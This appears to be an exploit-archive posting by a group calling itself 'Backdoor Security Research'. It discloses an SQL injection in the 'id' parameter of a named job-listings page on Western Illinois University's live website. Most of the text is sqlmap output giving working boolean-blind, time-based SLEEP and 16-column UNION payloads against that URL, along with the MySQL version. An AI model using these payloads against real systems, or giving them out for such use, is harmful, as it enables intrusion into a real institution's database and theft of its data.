--------------------------------------------------------- # Exploit Title: Western Illinois University - SQL Injection # Google Dork: N/A # Date: 2020-12-03 # Exploit Author: Backdoor Security Research # Contact us : btm@tutanota.de # Vendor Homepage: http://www.wiu.edu # Software Link: N/A # Version: - # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- Demo: http://www.wiu.edu/employment/cs_job.php?id=401[Sql Injection] sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=401 AND 4589=4589 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=401 AND (SELECT 4217 FROM (SELECT(SLEEP(5)))SCYZ) Type: UNION query Title: Generic UNION query (NULL) - 16 columns Payload: id=-8563 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176787071,0x70586a4e43496a44744844757a61476467507250716d7471634775484f72577544497361755a765a,0x71706b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [23:10:18] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ---------------------------------------------------------- # Discovred : Unkn0wn (0x9a@tutanota.com) # Visit: https://t.me/BackdoorTm # # "Backdoor Security Research" Part of " Backdoor Team "